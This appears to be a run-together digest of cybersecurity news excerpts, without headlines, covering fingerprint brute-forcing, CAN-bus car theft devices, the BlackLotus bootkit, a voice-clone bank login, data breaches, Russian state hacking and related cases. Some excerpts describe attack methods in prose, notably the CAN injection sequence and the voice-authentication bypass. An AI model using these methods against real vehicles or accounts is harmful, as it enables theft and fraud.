Chinese researchers say they successfully bypassed fingerprint authentication safeguards on smartphones by staging a brute force attack.
Researchers at Zhejiang University and Tencent Labs capitalized on vulnerabilities of modern smartphone fingerprint scanners to stage their break-in operation, which they named BrutePrint. Their findings are published on the arXiv preprint server.
A flaw in the Match-After-Lock feature, which is supposed to bar authentication activity once a device is in lockout mode, was overridden to allow a researcher to continue submitting an unlimited number of fingerprint samples.
Inadequate protection of biometric data stored on the Serial Peripheral Interface of fingerprint sensors enables attackers to steal fingerprint images. Samples also can be easily obtained from academic datasets or from biometric data leaks.
[…]
All Android devices and one HarmonyOS (Huawei) device tested by researchers had at least one flaw allowing for break-ins. Because of tougher defense mechanisms in IOS devices, specifically Apple iPhone SE and iPhone 7, those devices were able to withstand brute-force entry attempts. Researchers noted that iPhone devices were susceptible to CAMF vulnerabilities, but not to the extent that successful entry could be achieved.
To launch a successful break-in, an attacker requires physical access to a targeted phone for several hours, a printed circuit board easily obtainable for $15, and access to fingerprint images.
Fingerprint databases are available online through academic resources, but hackers more likely will access massive volumes of images obtained through data breaches.
[…]
More information: Yu Chen et al, BrutePrint: Expose Smartphone Fingerprint Authentication to Brute-force Attack, arXiv (2023). DOI: 10.48550/arxiv.2305.10791
Three digital marketing firms have agreed to pay $615,000 to resolve allegations that they submitted at least 2.4 million fake public comments to influence American internet policy.
New York Attorney General Letitia James announced last week the agreement with LCX, Lead ID, and Ifficient, each of which was found to have fabricated public comments submitted in 2017 to convince the Federal Communications Commission (FCC) to repeal net neutrality.
Net neutrality refers to a policy requiring internet service providers to treat people’s internet traffic more or less equally, which some ISPs opposed because they would have preferred to act as gatekeepers in a pay-to-play regime. The neutrality rules were passed in 2015 at a time when it was feared large internet companies would eventually eradicate smaller rivals by bribing ISPs to prioritize their connections and downplay the competition.
[…]
in 2017 Ajit Pai, appointed chairman of the FCC by the Trump administration, successfully spearheaded an effort to tear up those rules and remake US net neutrality so they’d be more amenable to broadband giants. And there was a public comment period on initiative.
It was a massive sham. The Office of the Attorney General (OAG) investigation [PDF] found that 18 million of 22 million comments submitted to the FCC were fake, both for and against net neutrality.
The broadband industry’s attempt in 2017 to have the FCC repeal the net neutrality rules accounted for more than 8.5 million fake comments at a cost of $4.2 million.
“The effort was intended to create the appearance of widespread grassroots opposition to existing net neutrality rules, which — as described in an internal campaign planning document — would help provide ‘cover’ for the FCC’s proposed repeal,” the report explained.
The report also stated an unidentified 19-year-old was responsible for more than 7.7 million of 9.3 million fake comments opposing the repeal of net neutrality. These were generated using software that fabricated identities. The origin of the other 1.6 million fake comments is unknown.
LCX, Lead ID, and Ifficient were said to have taken a different approach, one that allegedly involved reuse of old consumer data from different marketing or advocacy campaigns, purchased or obtained through misrepresentation. LCX is said to have obtained some of its data from “a large data breach file found on the internet.”
[…]
This was the second such agreement for the state of New York, which two years ago got a different set of digital marketing firms – Fluent, Opt-Intelligence, and React2Media – to pay $4.4 million to disgorge funds earned for distributing about 5.4 million fake public comments related to the FCC’s net neutrality process.
[…]
astroturfing – corporate messaging masquerading as grassroots public opinion.
[…]
“no federal laws or regulations exist that limit a public relations firm’s ability to engage in astroturfing.”
An ex-Ubiquiti engineer, Nickolas Sharp, was sentenced to six years in prison yesterday after pleading guilty in a New York court to stealing tens of gigabytes of confidential data, demanding a $1.9 million ransom from his former employer, and then publishing the data publicly when his demands were refused.
[…]
In a court document, Sharp claimed that Ubiquiti CEO Robert Pera had prevented Sharp from “resolving outstanding security issues,” and Sharp told the judge that this led to an “idiotic hyperfixation” on fixing those security flaws.
However, even if that was Sharp’s true motivation, Failla did not accept his justification of his crimes, which include wire fraud, intentionally damaging protected computers, and lying to the FBI.
“It was not up to Mr. Sharp to play God in this circumstance,” Failla said.
US attorney for the Southern District of New York, Damian Williams, argued that Sharp was not a “cybersecurity vigilante” but an “inveterate liar and data thief” who was “presenting a contrived deception to the Court that this entire offense was somehow just a misguided security drill.” Williams said that Sharp made “dozens, if not hundreds, of criminal decisions” and even implicated innocent co-workers to “divert suspicion.” Sharp also had already admitted in pre-sentencing that the cyber attack was planned for “financial gain.” Williams said Sharp did it seemingly out of “pure greed” and ego because Sharp “felt mistreated”—overworked and underpaid—by the IT company, Williams said.
Court documents show that Ubiquiti spent “well over $1.5 million dollars and hundreds of hours of employee and consultant time” trying to remediate what Williams described as Sharp’s “breathtaking” theft. But the company lost much more than that when Sharp attempted to conceal his crimes—posing as a whistleblower, planting false media reports, and contacting US and foreign regulators to investigate Ubiquiti’s alleged downplaying of the data breach. Within a single day after Sharp planted false reports, stocks plummeted, causing Ubiquiti to lose over $4 billion in market capitalization value, court documents show.
[…]
In his sentencing memo, Williams said that Sharp’s characterization of the cyberattack as a security drill does not align with the timeline of events leading up to his arrest in December 2021. The timeline instead appears to reveal a calculated plan to conceal the data theft and extort nearly $2 million from Ubiquiti.
Sharp began working as a Ubiquiti senior software engineer and “Cloud Lead” in 2018, where he was paid $250,000 annually and had tasks including software development and cloud infrastructure security. About two years into the gig, Sharp purchased a VPN subscription to Surfshark in July 2020 and then seemingly began hunting for another job. By December 9, 2020, he’d lined up another job. The next day, he used his Ubiquiti security credentials to test his plan to copy data repositories while masking his IP address by using Surfshark.
Less than two weeks later, Sharp executed his plan, and he might have gotten away with it if not for a “slip-up” he never could have foreseen. While copying approximately 155 data repositories, an Internet outage temporarily disabled his VPN. When Internet service was restored, unbeknownst to Sharp, Ubiquiti logged his home IP address before the VPN tool could turn back on.
Two days later, Sharp was so bold as to ask a senior cybersecurity employee if he could be paid for submitting vulnerabilities to the company’s HackerOne bug bounty program, which seemed suspicious, court documents show. Still unaware of his slip-up, through December 26, 2020, Sharp continued to access company data using Surfshark, actively covering his trails by deleting evidence of his activity within a day and modifying evidence to make it seem like other Ubiquiti employees were using the credentials he used during the attack.
Sharp only stopped accessing the data when other employees discovered evidence of the attack on December 28, 2020. Seemingly unfazed, Sharp joined the team investigating the attack before sending his ransom email on January 7, 2021.
Ubiquiti chose not to pay the ransom and instead got the FBI involved. Soon after, Sharp’s slip-up showing his home IP put the FBI on his trail. At work, Sharp suggested his home IP was logged in an attempt to frame him, telling coworkers, “I’d be pretty fucking incompetent if I left my IP in [the] thing I requested, downloaded, and uploaded” and saying that would be the “shittiest cover up ever lol.”
While the FBI analyzed all of Sharp’s work devices, Sharp wiped and reset the laptop he used in the attack but brazenly left the laptop at home, where it was seized during a warranted FBI search in March 2021.
After the FBI search, Sharp began posing as a whistleblower, contacting journalists and regulators to falsely warn that Ubiquiti’s public disclosure and response to the cyberattack were insufficient. He said the company had deceived customers and downplayed the severity of the breach, which was actually “catastrophic.” The whole time, Williams noted in his sentencing memo, Sharp knew that the attack had been accomplished using his own employee credentials.
This was “far from a hacker targeting a vulnerability open to third parties,” Williams said. “Sharp used credentials legitimately entrusted to him by the company, to steal data and cover his tracks.”
“At every turn, Sharp acted consistent with the unwavering belief that his sophistication and cunning were sufficient to deceive others and conceal his crime,” Williams said.
Miscreants have infected millions of Androids worldwide with malicious firmware before the devices even shipped from their factories, according to Trend Micro researchers at Black Hat Asia.
This hardware is mainly cheapo Android mobile devices, though smartwatches, TVs, and other things are caught up in it.
The gadgets have their manufacturing outsourced to an original equipment manufacturer (OEM). That outsourcing makes it possible for someone in the manufacturing pipeline – such as a firmware supplier – to infect products with malicious code as they ship out, the researchers said.
This has been going on for a while, we think; for example, we wrote about a similar headache in 2017. The Trend Micro folks characterized the threat today as “a growing problem for regular users and enterprises.” So, consider this a reminder and a heads-up all in one.
[…]
This insertion of malware began as the price of mobile phone firmware dropped, we’re told. Competition between firmware distributors became so furious that eventually the providers could not charge money for their product.
“But of course there’s no free stuff,” said Yarochkin, who explained that, as a result of this cut-throat situation, firmware started to come with an undesirable feature – silent plugins. The team analyzed dozens of firmware images looking for malicious software. They found over 80 different plugins, although many of those were not widely distributed.
The plugins that were the most impactful were those that had a business model built around them, were sold on the underground, and marketed in the open on places like Facebook, blogs, and YouTube.
The objective of the malware is to steal info or make money from information collected or delivered.
The malware turns the devices into proxies which are used to steal and sell SMS messages, take over social media and online messaging accounts, and used as monetization opportunities via adverts and click fraud.
One type of plugin, proxy plugins, allow the criminal to rent out devices for up to around five minutes at a time. For example, those renting the control of the device could acquire data on keystrokes, geographical location, IP address and more.
[…]
Through telemetry data, the researchers estimated that at least millions of infected devices exist globally, but are centralized in Southeast Asia and Eastern Europe. A statistic self-reported by the criminals themselves, said the researchers, was around 8.9 million.
As for where the threats are coming from, the duo wouldn’t say specifically, although the word “China” showed up multiple times in the presentation, including in an origin story related to the development of the dodgy firmware. Yarochkin said the audience should consider where most of the world’s OEMs are located and make their own deductions.
“Even though we possibly might know the people who build the infrastructure for this business, its difficult to pinpoint how exactly the this infection gets put into this mobile phone because we don’t know for sure at what moment it got into the supply chain,“ said Yarochkin.
The team confirmed the malware was found in the phones of at least 10 vendors, but that there was possibly around 40 more affected. For those seeking to avoid infected mobile phones, they could go some way of protecting themselves by going high end.
[…]
“Big brands like Samsung, like Google took care of their supply chain security relatively well, but for threat actors, this is still a very lucrative market,” said Yarochkin.
The Medusa ransomware gang has put online what it claims is a massive leak of internal Microsoft materials, including Bing and Cortana source code.
“This leak is of more interest to programmers, since it contains the source codes of the following Bing products, Bing Maps and Cortana,” the crew wrote on its website, which was screenshotted and shared by Emsisoft threat analyst Brett Callow.
“There are many digital signatures of Microsoft products in the leak. Many of them have not been recalled,” the gang continued. “Go ahead and your software will be the same level of trust as the original Microsoft product.”
Obviously, this could be a dangerous level of trust to give miscreants developing malware. Below is Callow’s summary of the purported dump of source code presumable obtained or stolen somehow from Microsoft.
#Medusa is sharing what is claimed to be “source codes of the following Bing products, Bing Maps and Cortana.” The leak is ~12GB and likely part of the ~37GB leaked by Lapsus in 2022. #Microsoft 1/2 pic.twitter.com/VpofBJGEcM
To be clear: we don’t know if the files are legit. Microsoft didn’t respond to The Register‘s request for comment, and ransomware gangs aren’t always the most trustworthy sources of information.
“At this point, it’s unclear whether the data is what it’s claimed to be,” Emsisoft’s Callow told The Register. “Also unclear is whether there’s any connection between Medusa and Lapsus$ but, with hindsight, certain aspects of their modus operandi does have a somewhat Lapsus$ish feel.”
He’s referring to a March 2022 security breach in which Lapsus$ claimed it broke into Microsoft’s internal DevOps environment and stole, then leaked, about 37GB of information including what the extortionists claimed to be Bing and Cortana’s internal source code, and WebXT compliance engineering projects.
Microsoft later confirmed Lapsus$ had compromised its systems, and tried to downplay the intrusion by insisting “no customer code or data was involved in the observed activities.”
“Microsoft does not rely on the secrecy of code as a security measure and viewing source code does not lead to elevation of risk,” it added, which is a fair point. Software should be and can be made secure whether its source is private or open.
And Lapsus$, of course, is the possibly extinct extortion gang led by teenagers who went on a cybercrime spree last year before the arrest of its alleged ringleaders. Before that, however, it stole data from Nvidia, Samsung, Okta, and others.
It could be that Medusa is spreading around stuff that was already stolen and leaked.
Shadetree hackers—or, as they’re more commonly called, tech-savvy thieves—have found a new way to steal cars. No, it’s not a relay attack, Bluetooth exploit, key fob replay, or even a USB cable. Instead, these thieves are performing a modern take on hot-wiring without ever ripping apart the steering column.
Crafty criminals have resorted to using specially crafted devices that simply plug into the wiring harness behind the headlight of a victim’s car. Once they’re plugged in, they’re able to unlock, start, and drive away before the owner even catches wind of what’s going on.
Last year, Ian Tabor, who runs the UK chapter of Car Hacking Village, had his Toyota RAV4 stolen from outside of his home near London. Days prior to the theft, he found that thieves had damaged his car without successfully taking it. It wasn’t quite clear if it was a case of vandalism, or if the thieves had tried to make off with the car’s front bumper, but he did notice that the headlight harness had been yanked out.
Ultimately, his car wound up missing when thieves successfully made away with it. And after Tabor’s car was stolen, so was his neighbor’s Toyota Land Cruiser. But, folks, this is 2023. It’s not like you can just hotwire a car and drive away as the movies suggest. This got Tabor curious—after all, hacking cars is something he does for fun. How exactly did the thieves make off with his car?
Tabor got to work with Toyota’s “MyT” app. This is Toyota’s telematics system which pumps Diagnostic Trouble Codes up to the automaker’s servers rather than forcing you to plug in a code reader to the car’s OBD2 port. Upon investigation, Tabor noticed that his Rav4 kicked off a ton of DTCs just prior to being stolen—one of which was for the computer that controls the car’s exterior lighting.
This led Tabor to wonder if the thieves somehow made use of the vehicle CAN Bus network to drive away with his car. After scouring the dark web, Tabor was able to locate expensive tools claiming to work for various automakers and models, including BMW, Cadillac, Chrysler, Fiat, Ford, GMC, Honda, Jeep, Jaguar, Lexus, Maserati, Nissan, Toyota, as well as Volkswagen. The cost? As much as $5,400, but that’s a drop in the bucket if they can actually deliver on the promise of enabling vehicle theft.
Tabor decided to order one of these devices to try out himself. Together with Ken Tindell, the CTO of Canis Automotive Labs, the duo tore down a device to find out what made it tick and publish a writeup of their findings.
As it turns out, the expensive device was comprised of just $10 in components. The real magic is in the programming, which was set up to inject fake CAN messages into the car’s actual CAN Bus network. The messages essentially tricked the car into thinking a trusted key was present, which convinced the CAN Gateway (the component that filters out CAN messages into their appropriate segmented networks) into passing along messages instructing the car to disable its immobilizer, unlocking the doors, and essentially allowed the thieves to just away.
What’s more, is that the device simply looked like an ordinary portable speaker. The guts were stuffed inside the shell of a JBL-branded Bluetooth speaker, and all the thief needs to do is simply power the device on.
Once the device is on and plugged in, it wakes up the CAN network by sending a frame—similar to if you were to pull on a door handle, approach with a passive entry key, or hit a button on your fob. It then listens for a specific CAN message to begin its attack. The device then emulates a hardware error which tricks other ECUs on the CAN network to stop sending messages so that the attacking device has priority to send its spoofed messages to CAN devices.
The pause of valid messages is when the device is able to go into attack mode. It then sends the spoofed “valid key present” messages to the gateway which makes the car think that an actual valid key is being used to control the vehicle. Next, the attacker simply presses the speaker’s “play” button, and the car’s doors are unlocked.
Given that the manufacturer of these CAN injection devices claims that the devices are so effective against a myriad of makes and models, it would seem that this could be an industry-wide problem that may take some brainstorming to fix.
The good news is that this type of attack can be thwarted. While there are quick-and-dirty methods that could potentially be re-defeated in the long run, an automaker looking to prevent this type of attack by encrypting its CAN Bus network. According to Tindell, Canis is working on a similar project to retrofit U.S. military vehicles with a similar encryption scheme, similar to what he suggests as the fix for commercial vehicles experiencing this issue.
Several law enforcement agencies have teamed up to take down Genesis Market, a website selling access to “over 80 million account access credentials,” which included the standard usernames and passwords, as well as much more dangerous data like session tokens. According to a press release from the US Department of Justice, the site was seized on Tuesday. The European Union Agency for Law Enforcement Cooperation (or Europol) says that 119 of the site’s users have been arrested.
Genesis Marketplace has been around since 2018, according to the Department of Justice, and was “one of the most prolific initial access brokers (IABs) in the cybercrime world.” It let hackers search for certain types of credentials, such as ones for social media accounts, bank accounts, etc., as well as search for credentials based on where in the world they came from.
The agencies have teamed up with HaveIBeenPwned.com to make it easy for the public to check if their login credentials were stolen, and I’d highly recommend doing so — because of the way Genesis worked, this isn’t the typical “just change your password and you’ll be fine scenario.” For instructions on how to check whether Genesis was selling your stolen info, check out the writeup from Troy Hunt, who runs HaveIBeenPwned.
(The TL;DR is that you should sign up for HIBP’s email notification service with all of your important email addresses, and then be sure to click the “Verify email” button in the confirmation email. Just searching for your email on the site won’t tell you if you were impacted.)
[…]
While Genesis Marketplace traded in usernames and passwords, it also sold access to users’ cookies and browser fingerprints as well, which could let hackers bypass protections like two-factor authentication. Cookies — or login tokens, to be specific — are files that websites store on your computer to show that you’ve already logged in by correctly entering your password and two-factor authentication information. They’re the reason you don’t have to log into a website each time you visit it. (They’re also the reason that the joint effort to take down Genesis was given the delightful codename “Operation Cookie Monster.”)
[…]
Genesis stole the fingerprints, too. What’s more, it even provided a browser extension that let hackers spoof the victim’s fingerprint while using their login cookie to gain access to an account, according to a 2019 report from ZDNET.
A unit of the Russian military intelligence service GROe has hacked routers of Dutch private individuals and small and medium-sized companies. The Military Intelligence Service (MIVD) has discovered this, writes de Volkskrant.
The routers are part of a worldwide attack network and can, for example, destroy or paralyze the network of ministries. It is estimated that there are thousands of hacked devices in the hands of the Russian unit worldwide. In the Netherlands, this would involve several dozen routers.
The hacked devices are more advanced routers of computers often located at small businesses. The Russian unit will take over the routers and can monitor and control them, investigative journalist Huib Modderkolk told NOS Radio 1 Journaal.
According to him, this unit was created to sabotage: “It is also called the most dangerous hacking group in the world.” ‘We know what you’re doing’
The MIVD discovered the digital attack because the service saw many Dutch IP addresses. According to Modderkolk, the victims often do not realize that they have been hacked. By accepting the router’s default settings or using a simple password, these routers are easy to hack. Individuals and companies have now been informed by the MIVD.
It is striking that the MIVD makes this information public: “They hope for more awareness that this is actually going on, but the aim is also to let the Russians know: ‘we know what you are doing'”. According to Modderkolk, this is a development of recent years, and the British and Americans are also increasingly disclosing this type of sensitive information. Disinformation and cyber threats
The National Coordinator for Counterterrorism and Security (NCTV) has already warned of disinformation and cyber threats in connection with the war in Ukraine. These cyber attacks could affect the communication system of banks or hospitals, among others. At the moment there are no specific threats, but due to the rapid developments of the war, this could change quickly.
It is not clear whether the hack of the Russian hacker group has to do with the war in Ukraine.
[…] The software engineers behind these systems are employees of NTC Vulkan. On the surface, it looks like a run-of-the-mill cybersecurity consultancy. However, a leak of secret files from the company has exposed its work bolstering Vladimir Putin’s cyberwarfare capabilities.
Thousands of pages of secret documents reveal how Vulkan’s engineers have worked for Russian military and intelligence agencies to support hacking operations, train operatives before attacks on national infrastructure, spread disinformation and control sections of the internet.
The company’s work is linked to the federal security service or FSB, the domestic spy agency; the operational and intelligence divisions of the armed forces, known as the GOU and GRU; and the SVR, Russia’s foreign intelligence organisation.
A diagram showing a Vulkan hacking reconnaissance system codenamed Scan, developed since 2018.
One document links a Vulkan cyber-attack tool with the notorious hacking group Sandworm, which the US government said twice caused blackouts in Ukraine, disrupted the Olympics in South Korea and launched NotPetya, the most economically destructive malware in history. Codenamed Scan-V, it scours the internet for vulnerabilities, which are then stored for use in future cyber-attacks.
Another system, known as Amezit, amounts to a blueprint for surveilling and controlling the internet in regions under Russia’s command, and also enables disinformation via fake social media profiles. A third Vulkan-built system – Crystal-2V – is a training program for cyber-operatives in the methods required to bring down rail, air and sea infrastructure. A file explaining the software states: “The level of secrecy of processed and stored information in the product is ‘Top Secret’.”
The Vulkan files, which date from 2016 to 2021, were leaked by an anonymous whistleblower angered by Russia’s war in Ukraine. Such leaks from Moscow are extremely rare. Days after the invasion in February last year, the source approached the German newspaper Süddeutsche Zeitung and said the GRU and FSB “hide behind” Vulkan.
[…]
Five western intelligence agencies confirmed the Vulkan files appear to be authentic. The company and the Kremlin did not respond to multiple requests for comment.
The leak contains emails, internal documents, project plans, budgets and contracts. They offer insight into the Kremlin’s sweeping efforts in the cyber-realm, at a time when it is pursuing a brutal war against Ukraine. It is not known whether the tools built by Vulkan have been used for real-world attacks, in Ukraine or elsewhere.
[…]
Some documents in the leak contain what appear to be illustrative examples of potential targets. One contains a map showing dots across the US. Another contains the details of a nuclear power station in Switzerland.
A map of the US found in the leaked Vulkan files as part of the multi-faceted Amezit system.
One document shows engineers recommending Russia add to its own capabilities by using hacking tools stolen in 2016 from the US National Security Agency and posted online.
John Hultquist, the vice-president of intelligence analysis at the cybersecurity firm Mandiant, which reviewed selections of the material at the request of the consortium, said: “These documents suggest that Russia sees attacks on civilian critical infrastructure and social media manipulation as one and the same mission, which is essentially an attack on the enemy’s will to fight.”
[…]
One of Vulkan’s most far-reaching projects was carried out with the blessing of the Kremlin’s most infamous unit of cyberwarriors, known as Sandworm. According to US prosecutors and western governments, over the past decade Sandworm has been responsible for hacking operations on an astonishing scale. It has carried out numerous malign acts: political manipulation, cyber-sabotage, election interference, dumping of emails and leaking.
Sandworm disabled Ukraine’s power grid in 2015. The following year it took part in Russia’s brazen operation to derail the US presidential election. Two of its operatives were indicted for distributing emails stolen from Hillary Clinton’s Democrats using a fake persona, Guccifer 2.0. Then in 2017 Sandworm purloined further data in an attempt to influence the outcome of the French presidential vote, the US says.
That same year the unit unleashed the most consequential cyber-attack in history. Operatives used a bespoke piece of malware called NotPetya. Beginning in Ukraine, NotPetya rapidly spread across the globe. It knocked offline shipping firms, hospitals, postal systems and pharmaceutical manufacturers – a digital onslaught that spilled over from the virtual into the physical world.
[…]
Hacking groups such as Sandworm penetrate computer systems by first looking for weak spots. Scan-V supports that process, conducting automated reconnaissance of potential targets around the world in a hunt for potentially vulnerable servers and network devices. The intelligence is then stored in a data repository, giving hackers an automated means of identifying targets.
[…]
One part of Amezit is domestic-facing, allowing operatives to hijack and take control of the internet if unrest breaks out in a Russian region, or the country gains a stronghold over territory in a rival nation state, such as Ukraine. Internet traffic deemed to be politically harmful can be removed before it has a chance to spread.
A 387-page internal document explains how Amezit works. The military needs physical access to hardware, such as mobile phone towers, and to wireless communications. Once they control transmission, traffic can be intercepted. Military spies can identify people browsing the web, see what they are accessing online, and track information that users are sharing.
[…]
the firm developed a bulk collection program for the FSB called Fraction. It combs sites such as Facebook or Odnoklassniki – the Russian equivalent – looking for key words. The aim is to identify potential opposition figures from open source data.
[…]
This Amezit sub-system allows the Russian military to carry out large-scale covert disinformation operations on social media and across the internet, through the creation of accounts that resemble real people online, or avatars. The avatars have names and stolen personal photos, which are then cultivated over months to curate a realistic digital footprint.
The leak contains screenshots of fake Twitter accounts and hashtags used by the Russian military from 2014 until earlier this year. They spread disinformation, including a conspiracy theory about Hillary Clinton and a denial that Russia’s bombing of Syria killed civilians. Following the invasion of Ukraine, one Vulkan-linked fake Twitter account posted: “Excellent leader #Putin”.
A tweet from a fake social media account linked to Vulkan.
Another Vulkan-developed project linked to Amezit is far more threatening. Codenamed Crystal-2V, it is a training platform for Russian cyber-operatives. Capable of allowing simultaneous use by up to 30 trainees, it appears to simulate attacks against a range of essential national infrastructure targets: railway lines, electricity stations, airports, waterways, ports and industrial control systems.
American university researchers have developed a novel attack called “Near-Ultrasound Inaudible Trojan” (NUIT) that can launch silent attacks against devices powered by voice assistants, like smartphones, smart speakers, and other IoTs.
The team of researchers consists of professor Guenevere Chen of the University of Texas in San Antonio (UTSA), her doctoral student Qi Xia, and professor Shouhuai Xu of the University of Colorado (UCCS).
The team demonstrated NUIT attacks against modern voice assistants found inside millions of devices, including Apple’s Siri, Google’s Assistant, Microsoft’s Cortana, and Amazon’s Alexa, showing the ability to send malicious commands to those devices.
Inaudible attacks
The main principle that makes NUIT effective and dangerous is that microphones in smart devices can respond to near-ultrasound waves that the human ear cannot, thus performing the attack with minimal risk of exposure while still using conventional speaker technology.
In a post on USTA’s site, Chen explained that NUIT could be incorporated into websites that play media or YouTube videos, so tricking targets into visiting these sites or playing malicious media on trustworthy sites is a relatively simple case of social engineering.
The researchers say the NUIT attacks can be conducted using two different methods.
The first method, NUIT-1, is when a device is both the source and target of the attack. For example, an attack can be launched on a smartphone by playing an audio file that causes the device to perform an action, such as opening a garage door or sending a text message.
The other method, NUIT-2, is when the attack is launched by a device with a speaker to another device with a microphone, such as a website to a smart speaker.
Health data and other personal information of members of Congress and staff were stolen during a breach of servers run by DC Health Care Link and are now up for sale on the dark web.
The FBI is investigating the intrusion, which came to light Wednesday after Catherine Szpindor, the House of Representatives’ chief administrative officer, sent a letter to House members telling them of the incident. Szpindor wrote that she was alerted to the hack by the FBI and US Capitol Police.
DC Health Link is the online marketplace for the Affordable Care Act that administers the healthcare plans for members of Congress as well as their family and staff.
Szpindor called the incident “a significant data breach” that exposed the personal identifiable information (PII) of thousands of DC Health Link employees and warned the Representatives that their data may have been compromised.
“Currently, I do not know the size and scope of the breach,” she wrote, adding the FBI informed her that account information and PII of “hundreds” of House and staff members were stolen. Once Szpindor has a list of the data taken, she will directly contact those people affected.
[…]
Thousands of House Members and employees from across the United States have enrolled in health insurance through DC Health Link for themselves and their families since 2014,” McCarthy and Jeffries wrote. “The size and scope of impacted House customers could be extraordinary.”
Szpindor in her letter recommended House members consider freezing their credit at Equifax, Experian, and TransUnion until the breadth of the breach is known, particularly which representatives and staff members had their data compromised.
According to CNBC, the Senate may also have been impacted by the breach, with an email sent to offices in that side of Congress saying the Senate at Arms was told of the breach from law enforcement and the “data included the full names, date of enrollment, relationship (self, spouse, child), and email address, but no other Personally Identifiable Information (PII).”
The FBI in a terse statement to the media said it was “aware of this incident and is assisting. This is an ongoing investigation.” Capitol Police said they were working with the FBI.
[…]
At least some of the PII taken during the breach found its way onto a dark web marketplace. In their letter, McCarthy and Jeffries noted the FBI was able to buy the PII and other enrollee information that was breached. The information included names of spouses and dependent children, Social Security numbers, and home addresses.
CNBC said a post on a dark web site put up for sale the data of 170,000 Health Link members and posted data from 11 users as a sample.
[…]
Organizations in the healthcare field have come under increasing attacks in recent years, which is unsurprising given the vast amounts of PII and health data – from medical records to Social Security numbers – they hold on doctors, staff, and patients.
Cybersecurity firm Check Point in a report said the number of cyberattacks around the world jumped 38 percent year-over-year in 2022 and that healthcare, education and research, and government were the top three targeted sectors
BlackLotus, a UEFI bootkit that’s sold on hacking forums for about $5,000, can now bypass Secure Boot, making it the first known malware to run on Windows systems even with the firmware security feature enabled.
Secure Boot is supposed to prevent devices from running unauthorized software on Microsoft machines. But by targeting UEFI the BlackLotus malware loads before anything else in the booting process, including the operating system and any security tools that could stop it.
Kaspersky’s lead security researcher Sergey Lozhkin first saw BlackLotus being sold on cybercrime marketplaces back in October 2022 and security specialists have been taking apart piece by piece ever since.
[…]
BlackLotus exploits a more than one-year-old vulnerability, CVE-2022-21894, to bypass the secure boot process and establish persistence. Microsoft fixed this CVE in January 2022, but miscreants can still exploit it because the affected signed binaries have not been added to the UEFI revocation list, Smolár noted.
“BlackLotus takes advantage of this, bringing its own copies of legitimate – but vulnerable – binaries to the system in order to exploit the vulnerability,” he wrote.
Plus, a proof-of-concept exploit for this vulnerability has been publicly available since August 2022, so expect to see more cybercriminals using this issue for illicit purposes soon.
Making it even more difficult to detect: BlackLotus can disable several OS security tools including BitLocker, Hypervisor-protected Code Integrity (HVCI) and Windows Defender, and bypass User Account Control (UAC), according to the security shop.
[…]
Once BlackLotus exploits CVE-2022-21894 and turns off the system’s security tools, it deploys a kernel driver and an HTTP downloader. The kernel driver, among other things, protects the bootkit files from removal, while the HTTP downloader communicates with the command-and-control server and executes payloads.
The bootkit research follows UEFI vulnerabilities in Lenovo laptops that ESET discovered last spring, which, among other things, allow attackers to disable secure boot.
On Wednesday, I phoned my bank’s automated service line. To start, the bank asked me to say in my own words why I was calling. Rather than speak out loud, I clicked a file on my nearby laptop to play a sound clip: “check my balance,” my voice said. But this wasn’t actually my voice. It was a synthetic clone I had made using readily available artificial intelligence technology.
“Okay,” the bank replied. It then asked me to enter or say my date of birth as the first piece of authentication. After typing that in, the bank said “please say, ‘my voice is my password.’”
Again, I played a sound file from my computer. “My voice is my password,” the voice said. The bank’s security system spent a few seconds authenticating the voice.
“Thank you,” the bank said. I was in.
I couldn’t believe it—it had worked. I had used an AI-powered replica of a voice to break into a bank account. After that, I had access to the account information, including balances and a list of recent transactions and transfers.
Banks across the U.S. and Europe use this sort of voice verification to let customers log into their account over the phone. Some banks tout voice identification as equivalent to a fingerprint, a secure and convenient way for users to interact with their bank. But this experiment shatters the idea that voice-based biometric security provides foolproof protection in a world where anyone can now generate synthetic voices for cheap or sometimes at no cost. I used a free voice creation service from ElevenLabs, an AI-voice company.
Now, abuse of AI-voices can extend to fraud and hacking. Some experts I spoke to after doing this experiment are now calling for banks to ditch voice authentication altogether, although real-world abuse at this time could be rare.
Microsoft Edge has been spotted inserting a banner into the Chrome download page on Google.com begging people to stick with the Windows giant’s browser.
As noted this week by Neowin, an attempt to download and install Chrome Canary using Edge Canary – both experimental browser builds – led to the presentation in the Edge browser window of a banner graphic celebrating the merits of Edge.
Screenshot of Edge injecting an anti-Chrome banner ad into Google.com’s Chrome download page … Source: Chris Frantz
“Microsoft Edge runs on the same technology as Chrome, with the added trust of Microsoft,” the banner proclaims atop a button labeled “Browse securely now.”
This was on a Google web page, google.com/chrome/canary/thank-you.html, and it’s not clear how this ad surfaced. Edge appears to display the banner by itself when the user surfs to the Chrome download page on Google.com, which is just a little bit aggressive.
Microsoft did not immediately respond to a request to explain the promotion and the mechanics behind it.
The ad does not appear to have been delivered through normal ad servers based on its page placement. There’s debate among those discussing the banner online whether the ad consists of code injected by Edge into Google’s webpage, which would make it detectable and removable as part of the Document Object Model.
It has also been suggested that the ad may come from Edge as an interface element that’s stacked atop the rendered web page. We believe this is the case.
An individual familiar with browser development confirmed to The Register that he could reproduce the ad, which was said to be written in HTML but wasn’t placed “in” the page. He described the ad as its own browser window that, surprisingly, was viewable with Edge’s “Inspect” option for viewing source code.
Our source speculated the ad was implemented in a way that pushes down the “Content area” – the space where loaded web pages get rendered – to make space for a second rendering area that holds the ad.
The main content area and the ad content area do not interact with each other – they exist in separate worlds, so to speak. But the presence of the ad content area can be inferred by checking the main window’s innerHeight and outerHeight parameters.
Given two browser windows, one with the ad and one without, the main window with the ad will have an innerHeight value that’s less than a similarly sized window without the ad. The difference in the two measurements should correspond to the height of the ad content area.
Similar behavior can be found when visiting the Chrome Web Store using Microsoft Edge on macOS: the Chrome Web Store page is topped by an Edge banner that states, “Now you can add extensions from the Chrome Web Store to Microsoft Edge,” followed by a boxed button that says, “Allow extensions from other stores.”
The US Cybersecurity and Infrastructure Security Agency (CISA) has released a recovery script to help companies whose servers were scrambled in the recent ESXiArgs ransomware outbreak.
The malware attack hit thousands of servers over the globe but there’s no need to enrich criminals any more. In addition to the script, CISA and the FBI today published ESXiArgs ransomware virtual machine recovery guidance on how to recover systems as soon as possible.
The software nasty is estimated to be on more than 3,800 servers globally, according to the Feds. However, “the victim count is likely higher due to Internet search engines being a point-in-time scan and devices being taken offline for remediation before a second scan,” Arctic Wolf Labs’ security researchers noted.
Uncle Sam urged all organizations managing VMware ESXi servers to update to the latest version of the software, harden ESXi hypervisors by disabling the Service Location Protocol (SLP) service, and make sure that ESXi isn’t exposed to the public internet.
VMware has its own guidance here for administrators.
